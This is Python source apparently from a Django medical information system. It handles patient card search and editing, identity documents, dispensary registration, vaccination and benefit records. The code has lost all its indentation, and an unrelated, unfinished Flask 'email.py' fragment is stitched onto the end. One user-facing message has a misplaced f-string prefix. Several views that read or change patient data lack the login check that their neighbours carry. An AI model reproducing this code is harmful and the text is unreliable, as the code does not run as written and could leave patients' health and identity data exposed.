cards = Card.objects.filter(base=card_type, individual__in=objects)
if not has_phone_search and re.match(p3, query):
cards = cards.filter(number=query)
if p_enp and cards:
cards = cards.filter(carddocusage__document__number=query, carddocusage__document__document_type__title='Полис ОМС')
if cards:
medbook_number = str(form.get('medbookNumber', ''))
if medbook_number and SettingManager.l2('profcenter'):
cards = cards.filter(medbook_number=medbook_number)
d1, d2 = start_end_year()
if birthday_order:
cards = cards.order_by('-individual__birthday')
if not inc_archive:
cards = cards.filter(is_archive=False)
row: Card
for row in (
cards
.select_related("individual", "base")
.prefetch_related(
Prefetch(
'individual__document_set',
queryset=Document.objects.filter(is_active=True, document_type__title__in=['СНИЛС', 'Паспорт гражданина РФ', 'Полис ОМС'])
.distinct("pk", "number", "document_type", "serial")
.select_related('document_type')
.order_by('pk'),
),
'phones_set',
)
.distinct()[:limit]
):
disp_data = sql_func.dispensarization_research(row.individual.sex, row.individual.age_for_year(), row.pk, d1, d2)
status_disp = 'finished'
if not disp_data:
status_disp = 'notneed'
else:
for i in disp_data:
if not i[4]:
status_disp = 'need'
break
data.append(
{
"type_title": card_type.title,
"base_pk": row.base_id,
"num": row.number,
"is_rmis": row.base.is_rmis,
"family": row.individual.family,
"name": row.individual.name,
"twoname": row.individual.patronymic,
"birthday": row.individual.bd(),
"age": row.individual.age_s(),
"fio_age": row.individual.fio(full=True),
"sex": row.individual.sex,
"individual_pk": row.individual_id,
"isArchive": row.is_archive,
"pk": row.pk,
"phones": Phones.phones_to_normalized_list(row.phones_set.all(), row.phone),
"main_diagnosis": row.main_diagnosis,
"docs": [
*[
{
"pk": x.pk,
"type_title": x.document_type.title,
"document_type_id": x.document_type_id,
"serial": x.serial,
"number": x.number,
"is_active": x.is_active,
"date_start": x.date_start,
"date_end": x.date_end,
"who_give": x.who_give,
"from_rmis": x.from_rmis,
"rmis_uid": x.rmis_uid,
}
for x in row.individual.document_set.all()
],
*(
[
{
"pk": -10,
"type_title": "Номер мед.книжки",
"document_type_id": -10,
"serial": "",
"number": str(row.medbook_number),
"is_active": True,
"date_start": None,
"date_end": None,
"who_give": "",
"from_rmis": False,
"rmis_uid": None,
}
] if row.medbook_number else []
)
],
"medbookNumber": row.medbook_number,
"status_disp": status_disp,
"disp_data": disp_data,
}
)
return JsonResponse({"results": data})
@login_required
def patients_search_individual(request):
objects = []
data = []
d = json.loads(request.body)
query = d['query'].strip()
p = re.compile(r'[а-яё]{3}[0-9]{8}', re.IGNORECASE)
p2 = re.compile(r'^([А-яЁё\-]+)( ([А-яЁё\-]+)(( ([А-яЁё\-]*))?( ([0-9]{2}\.[0-9]{2}\.[0-9]{4}))?)?)?$')
p4 = re.compile(r'individual_pk:\d+')
pat_bd = re.compile(r"\d{4}-\d{2}-\d{2}")
if re.search(p, query.lower()):
initials = query[0:3].upper()
btday = query[7:11] + "-" + query[5:7] + "-" + query[3:5]
if not pat_bd.match(btday):
return JsonResponse([], safe=False)
try:
objects = Individual.objects.filter(family__startswith=initials[0], name__startswith=initials[1], patronymic__startswith=initials[2], birthday=btday)
except ValidationError:
objects = []
elif re.search(p2, query):
f, n, p, rmis_req, split = full_patient_search_data(p, query)
objects = Individual.objects.filter(family__istartswith=f, name__istartswith=n, patronymic__istartswith=p)
if len(split) > 3:
objects = Individual.objects.filter(family__istartswith=f, name__istartswith=n, patronymic__istartswith=p, birthday=datetime.datetime.strptime(split[3], "%d.%m.%Y").date())
if re.search(p4, query):
objects = Individual.objects.filter(pk=int(query.split(":")[1]))
n = 0
if not isinstance(objects, list):
for row in objects.distinct().order_by("family", "name", "patronymic", "birthday"):
n += 1
data.append({"family": row.family, "name": row.name, "patronymic": row.patronymic, "birthday": row.bd(), "age": row.age_s(), "sex": row.sex, "pk": row.pk})
if n == 25:
break
return JsonResponse({"results": data})
def patients_search_l2_card(request):
data = []
request_data = json.loads(request.body)
cards = Card.objects.filter(pk=request_data.get('card_pk', -1))
if cards.exists():
card_orig = cards[0]
Card.add_l2_card(card_orig=card_orig)
l2_cards = Card.objects.filter(individual=card_orig.individual, base__internal_type=True)
for row in l2_cards.filter(is_archive=False):
docs = (
Document.objects.filter(individual__pk=row.individual_id, is_active=True, document_type__title__in=['СНИЛС', 'Паспорт гражданина РФ', 'Полис ОМС'])
.distinct("pk", "number", "document_type", "serial")
.order_by('pk')
)
data.append(
{
"type_title": row.base.title,
"num": row.number,
"is_rmis": row.base.is_rmis,
"family": row.individual.family,
"name": row.individual.name,
"twoname": row.individual.patronymic,
"birthday": row.individual.bd(),
"age": row.individual.age_s(),
"sex": row.individual.sex,
"individual_pk": row.individual_id,
"base_pk": row.base_id,
"pk": row.pk,
"phones": row.get_phones(),
"docs": [{**model_to_dict(x), "type_title": x.document_type.title} for x in docs],
"main_diagnosis": row.main_diagnosis,
}
)
return JsonResponse({"results": data})
@login_required
def patients_get_card_data(request, card_id):
card = Card.objects.get(pk=card_id)
c = model_to_dict(card)
i = model_to_dict(card.individual)
docs = [
{**model_to_dict(x), "type_title": x.document_type.title}
for x in Document.objects.filter(individual=card.individual).distinct('pk', "number", "document_type", "serial").order_by('pk')
]
rc = Card.objects.filter(base__is_rmis=True, individual=card.individual)
d = District.objects.all().order_by('-sort_weight', '-id')
return JsonResponse(
{
**i,
**c,
"docs": docs,
"main_docs": card.get_card_documents(),
"main_address_full": card.main_address_full,
"fact_address_full": card.fact_address_full,
"has_rmis_card": rc.exists(),
"av_companies": [{"id": -1, "title": "НЕ ВЫБРАНО", "short_title": ""}, *[model_to_dict(x) for x in Company.objects.filter(active_status=True).order_by('title')]],
"custom_workplace": card.work_place != "",
"work_place_db": card.work_place_db_id or -1,
"district": card.district_id or -1,
"districts": [{"id": -1, "title": "НЕ ВЫБРАН"}, *[{"id": x.pk, "title": x.title} for x in d.filter(is_ginekolog=False)]],
"ginekolog_district": card.ginekolog_district_id or -1,
"gin_districts": [{"id": -1, "title": "НЕ ВЫБРАН"}, *[{"id": x.pk, "title": x.title} for x in d.filter(is_ginekolog=True)]],
"agent_types": [{"key": x[0], "title": x[1]} for x in Card.AGENT_CHOICES if x[0]],
"excluded_types": Card.AGENT_CANT_SELECT,
"agent_need_doc": Card.AGENT_NEED_DOC,
"mother": None if not card.mother else card.mother.get_fio_w_card(),
"mother_pk": card.mother_id,
"father": None if not card.father else card.father.get_fio_w_card(),
"father_pk": card.father_id,
"curator": None if not card.curator else card.curator.get_fio_w_card(),
"curator_pk": card.curator_id,
"agent": None if not card.agent else card.agent.get_fio_w_card(),
"agent_pk": card.agent_id,
"payer": None if not card.payer else card.payer.get_fio_w_card(),
"payer_pk": card.payer_id,
"rmis_uid": rc[0].number if rc.exists() else None,
"doc_types": [{"pk": x.pk, "title": x.title} for x in DocumentType.objects.all()],
"number_poli": card.number_poliklinika,
"harmful": card.harmful_factor,
"medbookNumber": card.medbook_number,
"medbookNumberCustom": card.medbook_number if card.medbook_type == 'custom' else '',
"medbookNumberCustomOriginal": card.medbook_number if card.medbook_type == 'custom' else '',
"medbookType": card.medbook_type,
"medbookTypePrev": card.medbook_type,
"isArchive": card.is_archive,
}
)
@login_required
@group_required("Лечащий врач", "Врач-лаборант", "Оператор лечащего врача", "Оператор Контакт-центра")
def patients_card_save(request):
request_data = json.loads(request.body)
message = ""
messages = []
if "new_individual" in request_data and (request_data["new_individual"] or not Individual.objects.filter(pk=request_data["individual_pk"])) and request_data["card_pk"] < 0:
i = Individual(family=request_data["family"], name=request_data["name"], patronymic=request_data["patronymic"], birthday=request_data["birthday"], sex=request_data["sex"])
i.save()
else:
changed = False
i = Individual.objects.get(pk=request_data["individual_pk"] if request_data["card_pk"] < 0 else Card.objects.get(pk=request_data["card_pk"]).individual_id)
if (
i.family != request_data["family"]
or i.name != request_data["name"]
or i.patronymic != request_data["patronymic"]
or str(i.birthday) != request_data["birthday"]
or i.sex != request_data["sex"]
):
changed = True
i.family = request_data["family"]
i.name = request_data["name"]
i.patronymic = request_data["patronymic"]
i.birthday = datetime.datetime.strptime(request_data["birthday"], "%d.%m.%Y" if '.' in request_data["birthday"] else "%Y-%m-%d").date()
i.sex = request_data["sex"]
i.save()
if Card.objects.filter(individual=i, base__is_rmis=True).exists() and changed:
try:
c = Client(modules=["individuals", "patients"])
c.patients.send_patient(Card.objects.filter(individual=i, base__is_rmis=True)[0])
except:
messages.append("Синхронизация с РМИС не удалась")
individual_pk = i.pk
if request_data["card_pk"] < 0:
with transaction.atomic():
base = CardBase.objects.select_for_update().get(pk=request_data["base_pk"], internal_type=True)
c = Card(number=Card.next_l2_n(), base=base, individual=i, main_diagnosis="", main_address="", fact_address="")
c.save()
card_pk = c.pk
Log.log(card_pk, 30000, request.user.doctorprofile, request_data)
else:
card_pk = request_data["card_pk"]
c = Card.objects.get(pk=card_pk)
individual_pk = request_data["individual_pk"]
c.main_diagnosis = request_data["main_diagnosis"]
try:
vals = json.loads(request_data["main_address_full"])
c.main_address = vals['address']
c.main_address_fias = vals['fias']
c.main_address_details = vals['details']
except:
c.main_address = request_data["main_address"]
c.main_address_fias = None
c.main_address_details = None
try:
vals = json.loads(request_data["fact_address_full"])
c.fact_address = vals['address']
c.fact_address_fias = vals['fias']
c.fact_address_details = vals['details']
except:
c.fact_address = request_data["fact_address"]
c.fact_address_fias = None
c.fact_address_details = None
c.number_poliklinika = request_data.get("number_poli", "")
if request_data["custom_workplace"] or not Company.objects.filter(pk=request_data.get("work_place_db", -1)).exists():
c.work_place_db = None
c.work_place = request_data["work_place"] if request_data["custom_workplace"] else ''
else:
c.work_place_db = Company.objects.get(pk=request_data["work_place_db"])
c.work_place = ''
c.district_id = request_data["district"] if request_data["district"] != -1 else None
c.ginekolog_district_id = request_data["gin_district"] if request_data["gin_district"] != -1 else None
c.work_position = request_data["work_position"]
c.phone = request_data["phone"]
c.harmful_factor = request_data.get("harmful", "")
medbook_type = request_data.get("medbookType", "")
medbook_number = str(request_data.get("medbookNumber", "-1"))
medbook_number_custom = str(request_data.get("medbookNumberCustom", "-1"))
medbook_number = medbook_number if medbook_type != 'custom' else medbook_number_custom
medbook_number_int = int(medbook_number) if medbook_number.isdigit() else None
if medbook_type == 'none' and c.medbook_type != 'none':
c.medbook_number = ''
c.medbook_type = medbook_type
else:
try:
with transaction.atomic():
base = CardBase.objects.select_for_update().get(pk=request_data["base_pk"], internal_type=True)
if medbook_type == 'custom' and medbook_number_int is not None and c.medbook_number != medbook_number_int:
medbook_auto_start = SettingManager.get_medbook_auto_start()
if medbook_number_int <= 1 or medbook_auto_start <= medbook_number_int:
raise Exception("Некорректный номер мед.книжки")
if Card.objects.filter(medbook_number=medbook_number, base=base).exclude(pk=c.pk).exists():
raise Exception(f"Номер {medbook_number} уже есть у другого пациента")
c.medbook_number = medbook_number_int
c.medbook_type = medbook_type
elif (c.medbook_type != 'auto' or c.medbook_number == '') and medbook_type == 'auto':
c.medbook_number = Card.next_medbook_n()
c.medbook_type = medbook_type
except Exception as e:
messages.append(str(e))
c.save()
if c.individual.primary_for_rmis:
try:
c.individual.sync_with_rmis()
except:
messages.append("Синхронизация с РМИС не удалась")
result = "ok"
return JsonResponse({"result": result, "message": message, "messages": messages, "card_pk": card_pk, "individual_pk": individual_pk})
@login_required
@group_required("Управление иерархией истории")
def patients_card_archive(request):
request_data = json.loads(request.body)
pk = request_data['pk']
card = Card.objects.get(pk=pk)
card.is_archive = True
card.save()
return JsonResponse({"ok": True})
@login_required
@group_required("Управление иерархией истории")
def patients_card_unarchive(request):
request_data = json.loads(request.body)
pk = request_data['pk']
card = Card.objects.get(pk=pk)
if card.is_archive:
n = card.number
if Card.objects.filter(number=n, is_archive=False, base=card.base).exists():
return JsonResponse({"ok": False, "message": "fНомер {n} уже занят другой картой"})
card.is_archive = False
card.save()
return JsonResponse({"ok": True})
def individual_search(request):
result = []
request_data = json.loads(request.body)
tfoms_module = SettingManager.l2('tfoms')
family = request_data["family"]
name = request_data["name"]
patronymic = request_data["patronymic"]
birthday = request_data["birthday"]
forced_gender = []
if tfoms_module and family and name and birthday:
from_tfoms = match_patient(family, name, patronymic, birthday)
for row in from_tfoms:
Individual.import_from_tfoms(row, no_update=True)
forced_gender.append(row['gender'].lower())
for i in Individual.objects.filter(family=family, name=name, patronymic=patronymic, birthday=birthday):
result.append(
{
"pk": i.pk,
"fio": i.fio(full=True),
"docs": [
{**model_to_dict(x), "type_title": x.document_type.title}
for x in Document.objects.filter(individual=i, is_active=True).distinct("number", "document_type", "serial", "date_end", "date_start")
],
"l2_cards": [{"number": x.number, "pk": x.pk} for x in Card.objects.filter(individual=i, base__internal_type=True, is_archive=False)],
}
)
forced_gender.append(i.sex)
forced_gender = None if not forced_gender or forced_gender.count(forced_gender[0]) != len(forced_gender) else forced_gender[0]
return JsonResponse({"result": result, 'forced_gender': forced_gender})
def get_sex_by_param(request):
request_data = json.loads(request.body)
t = request_data.get("t")
v = request_data.get("v", "")
r = "м"
if t == "name":
p = Individual.objects.filter(name=v)
r = "м" if p.filter(sex__iexact="м").count() >= p.filter(sex__iexact="ж").count() else "ж"
if t == "family":
p = Individual.objects.filter(family=v)
r = "м" if p.filter(sex__iexact="м").count() >= p.filter(sex__iexact="ж").count() else "ж"
if t == "patronymic":
p = Individual.objects.filter(patronymic=v)
r = "м" if p.filter(sex__iexact="м").count() >= p.filter(sex__iexact="ж").count() else "ж"
return JsonResponse({"sex": r})
def edit_doc(request):
request_data = json.loads(request.body)
pk = request_data["pk"]
serial = request_data["serial"]
number = request_data["number"]
type_o = DocumentType.objects.get(pk=request_data["type"])
is_active = request_data["is_active"]
date_start = request_data["date_start"]
date_start = None if date_start == "" else date_start
date_end = request_data["date_end"]
date_end = None if date_end == "" else date_end
who_give = request_data["who_give"] or ""
if pk == -1:
card = Card.objects.get(pk=request_data["card_pk"])
d = Document(
document_type=type_o,
number=number,
serial=serial,
from_rmis=False,
date_start=date_start,
date_end=date_end,
who_give=who_give,
is_active=is_active,
individual=Individual.objects.get(pk=request_data["individual_pk"]),
)
d.save()
cdu = CardDocUsage.objects.filter(card=card, document__document_type=type_o)
if not cdu.exists():
CardDocUsage(card=card, document=d).save()
else:
for c in cdu:
c.document = d
c.save(update_fields=["document"])
Log.log(d.pk, 30002, request.user.doctorprofile, request_data)
else:
for d in Document.objects.filter(pk=pk, from_rmis=False):
d.number = number
d.serial = serial
d.is_active = is_active
d.date_start = date_start
d.date_end = date_end
d.who_give = who_give
d.save()
Log.log(pk, 30002, request.user.doctorprofile, request_data)
d = Document.objects.get(pk=pk)
try:
d.sync_rmis()
except Exception as e:
print('RMIS error', e) # noqa: T001
return JsonResponse({"ok": True})
def update_cdu(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
doc = Document.objects.get(pk=request_data["doc"])
cdu = CardDocUsage.objects.filter(card=card, document__document_type=doc.document_type)
if not cdu.exists():
CardDocUsage(card=card, document=doc).save()
else:
for c in cdu:
c.document = doc
c.save(update_fields=["document"])
Log.log(card.pk, 30004, request.user.doctorprofile, request_data)
return JsonResponse({"ok": True})
def sync_rmis(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
card.individual.sync_with_rmis()
return JsonResponse({"ok": True})
def sync_tfoms(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
is_new, updated = card.individual.sync_with_tfoms()
return JsonResponse({"ok": True, "is_new": is_new, "updated": updated})
def update_wia(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
key = request_data["key"]
if key in [x[0] for x in Card.AGENT_CHOICES]:
card.who_is_agent = key
card.save()
Log.log(card.pk, 30006, request.user.doctorprofile, request_data)
return JsonResponse({"ok": True})
def edit_agent(request):
request_data = json.loads(request.body)
key = request_data["key"]
card = None if not request_data["card_pk"] else Card.objects.get(pk=request_data["card_pk"])
parent_card = Card.objects.filter(pk=request_data["parent_card_pk"])
doc = request_data["doc"] or ''
clear = request_data["clear"]
need_doc = key in Card.AGENT_NEED_DOC
upd = {}
if clear or not card:
upd[key] = None
if need_doc:
upd[key + "_doc_auth"] = ''
if parent_card[0].who_is_agent == key:
upd["who_is_agent"] = ''
else:
upd[key] = card
if need_doc:
upd[key + "_doc_auth"] = doc
if key not in Card.AGENT_CANT_SELECT:
upd["who_is_agent"] = key
for card in parent_card:
for k, v in upd.items():
setattr(card, k, v)
card.save(update_fields=list(upd.keys()))
Log.log(request_data["parent_card_pk"], 30005, request.user.doctorprofile, request_data)
return JsonResponse({"ok": True})
def load_dreg(request):
request_data = json.loads(request.body)
data = []
diagnoses = set()
for a in DispensaryReg.objects.filter(card__pk=request_data["card_pk"]).order_by('date_start', 'pk'):
data.append(
{
"pk": a.pk,
"diagnos": a.diagnos,
"illnes": a.illnes,
"spec_reg": '' if not a.spec_reg else a.spec_reg.title,
"doc_start_reg": '' if not a.doc_start_reg else a.doc_start_reg.get_fio(),
"doc_start_reg_id": a.doc_start_reg_id,
"date_start": '' if not a.date_start else strdate(a.date_start),
"doc_end_reg": '' if not a.doc_end_reg else a.doc_end_reg.get_fio(),
"doc_end_reg_id": a.doc_end_reg_id,
"date_end": '' if not a.date_end else strdate(a.date_end),
"why_stop": a.why_stop,
}
)
if not a.date_end:
diagnoses.add(a.diagnos)
researches = []
specialities = []
researches_data = []
specialities_data = []
card = Card.objects.get(pk=request_data["card_pk"])
visits = VisitPurpose.objects.filter(title__icontains="диспансерн")
year = request_data.get('year', '2020')
for d in sorted(diagnoses):
need = DispensaryPlan.objects.filter(diagnos=d)
for i in need:
if i.research:
if i.research not in researches:
researches.append(i.research)
results = research_last_result_every_month([i.research], card, year)
plans = get_dispensary_reg_plans(card, i.research, None, year)
researches_data.append(
{
"type": "research",
"research_title": i.research.title,
"research_pk": i.research.pk,
"assign_research_pk": i.research.pk,
"assignment": False,
"diagnoses_time": [],
"results": results,
"plans": plans,
"max_time": 1,
"times": len([x for x in results if x]),
}
)
index_res = researches.index(i.research)
researches_data[index_res]['diagnoses_time'].append({"diagnos": i.diagnos, "times": i.repeat})
if i.speciality:
if i.speciality not in specialities:
specialities.append(i.speciality)
results = research_last_result_every_month(Researches.objects.filter(speciality=i.speciality), request_data["card_pk"], year, visits)
plans = get_dispensary_reg_plans(card, None, i.speciality, year)
spec_assign_research = Researches.objects.filter(speciality=i.speciality).first()
specialities_data.append(
{
"type": "speciality",
"research_title": i.speciality.title,
"research_pk": i.speciality.pk,
"assign_research_pk": spec_assign_research.pk if spec_assign_research else None,
"assignment": False,
"diagnoses_time": [],
"results": results,
"plans": plans,
"max_time": 1,
"times": len([x for x in results if x]),
}
)
index_spec = specialities.index(i.speciality)
specialities_data[index_spec]['diagnoses_time'].append({"diagnos": i.diagnos, "times": i.repeat})
researches_data.extend(specialities_data)
return JsonResponse({"rows": data, "researches_data": researches_data, "year": year})
def load_screening(request):
card_pk: int = data_parse(request.body, {'cardPk': int})[0]
screening = ScreeningRegPlan.get_screening_data(card_pk)
return JsonResponse({"data": screening})
def research_last_result_every_month(researches: List[Researches], card: Card, year: str, visits: Optional[List[VisitPurpose]] = None):
results = []
filter = {
"napravleniye__client": card,
"research__in": researches,
"time_confirmation__year": year,
}
if visits:
filter['purpose__in'] = visits
for i in range(12):
i += 1
iss: Optional[Issledovaniya] = Issledovaniya.objects.filter(**filter, time_confirmation__month=str(i)).order_by("-time_confirmation").first()
if iss:
date = str(localtime(iss.time_confirmation).day).rjust(2, '0')
results.append({"pk": iss.napravleniye_id, "date": date})
else:
results.append(None)
return results
def get_dispensary_reg_plans(card, research, speciality, year):
plan = [''] * 12
disp_plan = DispensaryRegPlans.objects.filter(card=card, research=research, speciality=speciality, date__year=year)
for d in disp_plan:
if d.date:
plan[d.date.month - 1] = str(d.date.day).rjust(2, '0')
return plan
def update_dispensary_reg_plans(request):
request_data = json.loads(request.body)
DispensaryRegPlans.update_plan(request_data["card_pk"], request_data["researches_data_def"], request_data["researches_data"], request_data["year"])
return JsonResponse({"ok": True})
def update_screening_reg_plan(request):
request_data = json.loads(request.body)
ScreeningRegPlan.update_plan(request_data)
return JsonResponse({"ok": True})
def load_vaccine(request):
request_data = json.loads(request.body)
data = []
for a in VaccineReg.objects.filter(card__pk=request_data["card_pk"]).order_by('date', 'pk'):
data.append({"pk": a.pk, "date": strdate(a.date) if a.date else '', "title": a.title, "series": a.series, "amount": a.amount, "method": a.method, "step": a.step, "tap": a.tap})
return JsonResponse({"rows": data})
def load_ambulatory_data(request):
request_data = json.loads(request.body)
data = []
for a in AmbulatoryData.objects.filter(card__pk=request_data["card_pk"]).order_by('date', 'pk'):
data.append({"pk": a.pk, "date": strdate(a.date) if a.date else '', "data": a.data})
return JsonResponse({"rows": data})
def load_benefit(request):
request_data = json.loads(request.body)
data = []
for a in BenefitReg.objects.filter(card__pk=request_data["card_pk"]).order_by('date_start', 'pk'):
data.append(
{
"pk": a.pk,
"benefit": str(a.benefit),
"registration_basis": a.registration_basis,
"doc_start_reg": '' if not a.doc_start_reg else a.doc_start_reg.get_fio(),
"doc_start_reg_id": a.doc_start_reg_id,
"date_start": '' if not a.date_start else strdate(a.date_start),
"doc_end_reg": '' if not a.doc_end_reg else a.doc_end_reg.get_fio(),
"doc_end_reg_id": a.doc_end_reg_id,
"date_end": '' if not a.date_end else strdate(a.date_end),
}
)
return JsonResponse({"rows": data})
def load_dreg_detail(request):
a = DispensaryReg.objects.get(pk=json.loads(request.body)["pk"])
data = {
"diagnos": a.diagnos + ' ' + a.illnes,
"date_start": None if not a.date_start else a.date_start,
"date_end": None if not a.date_end else a.date_end,
"close": bool(a.date_end),
"why_stop": a.why_stop,
"time_index": a.what_times,
"identified_index": a.how_identified,
}
return JsonResponse(data)
def load_vaccine_detail(request):
a = VaccineReg.objects.get(pk=json.loads(request.body)["pk"])
data = {
"date": a.date,
"direction": a.direction,
"title": a.title,
"series": a.series,
"amount": a.amount,
"method": a.method,
"step": a.step,
"tap": a.tap,
"comment": a.comment,
}
return JsonResponse(data)
def load_ambulatory_data_detail(request):
a = AmbulatoryData.objects.get(pk=json.loads(request.body)["pk"])
str_adate = str(a.date)[0:7]
data = {
"date": str_adate,
"data": a.data,
}
return JsonResponse(data)
def load_ambulatory_history(request):
request_data = json.loads(request.body)
result = AmbulatoryDataHistory.objects.filter(card__pk=request_data["card_pk"]).order_by('-created_at')
rows = [{'date': strdate(i.created_at), 'data': i.text} for i in result]
return JsonResponse({"rows": rows})
def load_benefit_detail(request):
pk = json.loads(request.body)["card_pk"]
if pk > -1:
a = BenefitReg.objects.get(pk=pk)
data = {
"benefit_id": a.benefit_id,
"registration_basis": a.registration_basis,
"date_start": '' if not a.date_start else a.date_start,
"date_end": '' if not a.date_end else a.date_end,
"close": bool(a.date_end),
}
else:
data = {
"benefit_id": -1,
"registration_basis": "",
"date_start": '',
"date_end": '',
"close": False,
}
return JsonResponse(
{
"types": [{"pk": -1, "title": 'Не выбрано'}, *[{"pk": x.pk, "title": str(x)} for x in BenefitType.objects.filter(hide=False).order_by('pk')]],
**data,
}
)
@transaction.atomic
def save_dreg(request):
rd = json.loads(request.body)
d = rd["data"]
pk = rd["pk"]
n = False
create_disp_record = False
if pk == -1:
a = DispensaryReg.objects.create(card_id=rd["card_pk"])
pk = a.pk
n = True
create_disp_record = True
else:
pk = rd["pk"]
a = DispensaryReg.objects.get(pk=pk)
Log.log(pk, 40000 if n else 40001, request.user.doctorprofile, rd)
c = False
def fd(s):
if '.' in s:
s = s.split('.')
s = '{}-{}-{}'.format(s[2], s[1], s[0])
return s
if (
not a.date_start
and d["date_start"]
or str(a.date_start) != fd(d["date_start"])
or a.spec_reg != request.user.doctorprofile.specialities
or a.doc_start_reg != request.user.doctorprofile
):
a.date_start = fd(d["date_start"])
a.doc_start_reg = request.user.doctorprofile
a.spec_reg = request.user.doctorprofile.specialities
c = True
if not a.date_end and d["close"] or (d["close"] and str(a.date_end) != fd(d["date_end"])):
a.date_end = fd(d["date_end"])
a.why_stop = d["why_stop"]
a.doc_end_reg = request.user.doctorprofile
c = True
elif d["close"] and a.why_stop != d["why_stop"]:
a.why_stop = d["why_stop"]
c = True
if not d["close"] and (a.date_end or a.why_stop):
a.date_end = None
a.why_stop = ''
a.doc_end_reg = None
c = True
i = d["diagnos"].split(' ')
ds = i.pop(0)
if len(i) == 0:
i = ''
else:
i = ' '.join(i)
if a.diagnos != ds or a.illnes != i:
a.diagnos = ds
a.illnes = i
if create_disp_record:
disp_obj = DispensaryReg.objects.filter(card_id=rd["card_pk"], diagnos=ds, date_start=fd(d["date_start"]), doc_start_reg=request.user.doctorprofile)
if disp_obj.exists():
a.delete()
return JsonResponse({"ok": False, "pk": -1, "c": False})
c = True
if d.get('identified_index', 0) != a.how_identified:
a.how_identified = d.get('identified_index', 0)
c = True
if d.get('time_index', 0) != a.what_times:
a.what_times = d.get('time_index', 0)
c = True
if c:
a.save()
return JsonResponse({"ok": True, "pk": pk, "c": c})
@transaction.atomic
def save_vaccine(request):
rd = json.loads(request.body)
d = rd["data"]
pk = rd["pk"]
n = False
if pk == -1:
a = VaccineReg.objects.create(card_id=rd["card_pk"])
pk = a.pk
n = True
else:
pk = rd["pk"]
a = VaccineReg.objects.get(pk=pk)
Log.log(pk, 70000 if n else 70001, request.user.doctorprofile, rd)
c = False
def fd(s):
if '.' in s:
s = s.split('.')
s = '{}-{}-{}'.format(s[2], s[1], s[0])
return s
if str(a.date) != fd(d["date"]):
a.date = fd(d["date"])
c = True
if a.direction != d["direction"]:
a.direction = d["direction"]
c = True
if a.title != d["title"]:
a.title = d["title"]
c = True
if a.series != d["series"]:
a.series = d["series"]
c = True
if a.amount != d["amount"]:
a.amount = d["amount"]
c = True
if a.step != d["step"]:
a.step = d["step"]
c = True
if a.tap != d["tap"]:
a.tap = d["tap"]
c = True
if a.comment != d["comment"]:
a.comment = d["comment"]
c = True
if a.method != d["method"]:
a.method = d["method"]
c = True
if not a.doc:
a.doc = request.user.doctorprofile
c = True
if c:
a.save()
return JsonResponse({"ok": True, "pk": pk, "c": c})
@transaction.atomic
def save_ambulatory_data(request):
rd = json.loads(request.body)
d = rd["data"]
pk = rd["pk"]
date_request = f"{d['date']}-01"
if pk == -1:
a = AmbulatoryData.objects.create(card_id=rd["card_pk"])
pk = a.pk
else:
pk = rd["pk"]
a = AmbulatoryData.objects.get(pk=pk)
c = False
def fd(s):
if '.' in s:
s = s.split('.')
s = '{}-{}-{}'.format(s[2], s[1], s[0])
return s
if str(a.date) != fd(date_request):
a.date = fd(date_request)
c = True
if a.data != d["data"]:
a.data = d["data"]
c = True
if not a.doc:
a.doc = request.user.doctorprofile
c = True
if c:
a.save()
AmbulatoryDataHistory.save_ambulatory_history(rd["card_pk"], request.user.doctorprofile)
return JsonResponse({"ok": True, "pk": pk, "c": c})
@transaction.atomic
def save_benefit(request):
rd = json.loads(request.body)
d = rd["data"]
pk = rd["pk"]
n = False
c = False
if pk == -1:
a = BenefitReg.objects.create(card_id=rd["card_pk"], benefit_id=d["benefit_id"])
pk = a.pk
n = True
else:
pk = rd["pk"]
a = BenefitReg.objects.get(pk=pk)
if a.benefit_id != d["benefit_id"]:
a.benefit_id = d["benefit_id"]
c = True
Log.log(pk, 50000 if n else 50001, request.user.doctorprofile, {**rd, "data": {**{k: v for k, v in rd["data"].items() if k not in ['types']}}})
def fd(s):
if '.' in s:
s = s.split('.')
s = '{}-{}-{}'.format(s[2], s[1], s[0])
return s
if not a.date_start and d["date_start"] or str(a.date_start) != fd(d["date_start"]) or a.doc_start_reg != request.user.doctorprofile:
a.date_start = fd(d["date_start"])
a.doc_start_reg = request.user.doctorprofile
c = True
if a.registration_basis != d["registration_basis"]:
a.registration_basis = d["registration_basis"]
c = True
if not a.date_end and d["close"] or (d["close"] and a.doc_end_reg != request.user.doctorprofile) or (d["close"] and str(a.date_end) != fd(d["date_end"])):
a.date_end = fd(d["date_end"])
a.doc_end_reg = request.user.doctorprofile
c = True
if not d["close"] and a.date_end:
a.date_end = None
a.doc_end_reg = None
c = True
if c:
a.save()
return JsonResponse({"ok": True, "pk": pk, "c": c})
def load_anamnesis(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
history = []
for a in AnamnesisHistory.objects.filter(card=card).order_by('-pk'):
history.append(
{
"pk": a.pk,
"text": a.text,
"who_save": {
"fio": a.who_save.get_fio(dots=True),
"department": a.who_save.podrazdeleniye.get_title(),
},
"datetime": a.created_at.astimezone(pytz.timezone(settings.TIME_ZONE)).strftime("%d.%m.%Y %X"),
}
)
data = {
"text": card.anamnesis_of_life,
"history": history,
}
return JsonResponse(data)
def save_anamnesis(request):
request_data = json.loads(request.body)
card = Card.objects.get(pk=request_data["card_pk"])
if card.anamnesis_of_life != request_data["text"]:
card.anamnesis_of_life = request_data["text"]
card.save()
AnamnesisHistory(card=card, text=request_data["text"], who_save=request.user.doctorprofile).save()
return JsonResponse({"ok": True})
def create_l2_individual_from_card(request):
request_data = json.loads(request.body)
polis = request_data['polis']
has_tfoms_data = False
if SettingManager.l2('tfoms'):
from_tfoms = match_enp(polis)
if from_tfoms:
has_tfoms_data = True
Individual.import_from_tfoms(from_tfoms, no_update=True)
if not has_tfoms_data:
Individual.import_from_tfoms(
{
"enp": polis,
"family": request_data['family'],
"given": request_data['name'],
"patronymic": request_data['patronymic'],
"gender": request_data['sex'],
"birthdate": request_data['bdate'],
},
no_update=True,
)
return JsonResponse({"ok": True})
def is_l2_card(request):
request_data = json.loads(request.body)
card = Card.objects.filter(number=request_data['number'], base__internal_type=True).first()
if card:
return JsonResponse({"ok": True, "individual_fio": card.individual.fio()})
else:
return JsonResponse({"ok": False})
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
